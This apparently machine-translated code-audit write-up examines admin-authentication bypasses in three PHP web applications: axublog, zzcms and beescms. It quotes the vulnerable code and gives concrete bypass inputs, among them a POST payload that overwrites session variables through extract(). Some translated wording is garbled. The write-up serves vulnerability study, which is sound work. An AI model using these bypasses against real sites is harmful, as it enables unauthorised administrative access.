Explain
Recently, I have audited several open source PHP source programs and found that there is a problem of background program bypassing, and the ways of bypassing are different. Write a summary. The way of bypassing is divided into three levels: 1. Lack of verification code in the background; 2. Lack of rigorous verification code in the background; 3. Variable coverage vulnerability leads to the failure of background verification
Here are a few PHP source programs that I have audited.
Lack of verification in the background
For example, in the background of axublog 1.0.2, there is a function chkadcookie () to verify the administrator's login. However, there is no chkadcookie () in AD / art.php in the background, which results in unauthorized access.
axublog 1.0.2
chkadcookie()
ad/art.php
chkadcookie()
The principle of this vulnerability is also relatively simple. In general, the inexperienced developers have missed the verification function. At present, this vulnerability is relatively small.
Background verification code is not rigorous
This loophole is the most common one, and there are many strange situations.
Axublog background verification function bypass
Verification mode
The background verification function in axublog is chkadcookie(), and the code is as follows:
axublog
chkadcookie()
function chkadcookie() {
@$file = "../cache/txtchkad.txt";
@$fp = fopen($file, "r");
@$txtchkad = fread($fp, 4096);
$txtchkad2 = str_replace(@$_COOKIE["chkad"], '', $txtchkad);
if (@$_SESSION["chkad"] == '' && @$_COOKIE["chkad"] == '') {
header("Content-type:text/html; charset=utf-8");
echo '<div id=redmsg>请<a href="login.php">登录</a>。。。</div><script>tiao();</script>';
exit;
}
if ($txtchkad == $txtchkad2) {
header("Content-type:text/html; charset=utf-8");
echo '<div id=redmsg>请<a href="login.php">登录</a>。。。</div><script>tiao();</script>';
exit;
}}function loginpass($str) {
$txtchkad = $_SERVER['HTTP_USER_AGENT'] . '_' . $_SERVER['REMOTE_ADDR'] . '_' . $date;
$file = "../cache/txtchkad.txt";
if (file_exists($file)) {
$txt = file_get_contents($file);
$txt = $txtchkad . "\r\n" . $txt;
}
file_put_contents($file, $txt);}
Analyzing the code found very interesting problems: 1. Txtchkad.txt file records the client's
txtchkad.txt
$_SERVER['HTTP_USER_AGENT'] . '_' . $_SERVER['REMOTE_ADDR'] . '_' . $date
, only $date is unknown to us, while UA and remote_addr are controlled by the client. Two
$date
$txtchkad2 = str_replace(@$_COOKIE["chkad"], '', $txtchkad);($txtchkad == $txtchkad2)
The validation logic of is that if the value in txtchkad.txt appears in cookie, it is considered login. There are obvious problems in such verification logic.
COOKIE
txtchkad.txt
The problem is obvious. Now that we know the content of txtchkad.txt and that cookie is under our control, we can bypass it.
txtchkad.txt
COOKIE
Bypass validation
Just set chkad in cookie to "to bypass the background login.
chkad
_
Background verification function bypass of zzcms
Verification mode
The background verification code in zzcms is as follows:
zzcms
if (isset($_SESSION["admin"]) && isset($_SESSION["pass"])) {
$sql = "select * from zzcms_admin where admin='" . $_SESSION["admin"] . "'";
$rs = query($sql) or showmsg('查寻管理员信息出错');
$ok = is_array($row = fetch_array($rs));
if ($ok) {
if ($_SESSION["pass"] != $row['pass']) {
showmsg('管理员密码不正确,你无权进入该页面', '/admin/login.php');
}
} else {
showmsg('管理员已不存在,你无权进入该页面', '/admin/login.php');
}} else {
session_write_close();
echo("<script>top.location.href = '/admin/login.php';</script>");}?>
It can be found that if admin and pass do not exist in session, they will jump to the login code. The jump code is
admin
pass
echo("<script>top.location.href = '/admin/login.php';</script>");
。 Jump through the JS in the foreground, but there is no immediate exit (), which results in that the following code is still executable, so this verification method is useless.
exit()
Bypass mode
The bypass method is very simple, just disable JS code in the browser segment.
Variable coverage vulnerability causes background verification failure
Background verification function bypass of beescms
Verification mode
The code of checking the login function is ﹣ login():
is_login()
function is_login() {
if ($_SESSION['login_in'] == 1 && $_SESSION['admin']) {
if (time() - $_SESSION['login_time'] > 3600) {
login_out();
} else {
$_SESSION['login_time'] = time();
@session_regenerate_id();
}
return 1;
} else {
return 0;
}
Under normal circumstances, if the user cannot control the value in session, the above code is OK.
However, later analysis found that all the files will be introduced into the include / init.php file, including the code:
includes/init.php
session_start();$_COOKIE = fl_value($_COOKIE);$_GET = fl_value($_GET);@extract($_POST);@extract($_GET);@extract($_COOKIE);function fl_value($str) {
if (empty($str)) {
return;
}
return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file|outfile/i', '', $str);}
In the above code, we do not use the fl_value() function to filter $_post, but we use the extract() function, so we can bypass the verification by sending the post parameter to override the value in the session.
fl_value()
extract()
Bypass mode
The bypass method is very simple. Visit a page and send a post request as follows:
index.php
POST:_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999
The session variable is created successfully, including $session [login] = 1, $u session [Admin] = 1, session [logintime] = 999999999. Then visit the administrator page, and you can log in successfully.
summary
At the beginning of learning code audit, I found that these problems are very interesting, so I summed up. Of course, there are other types of back-end bypass methods, and I hope you can give me more advice.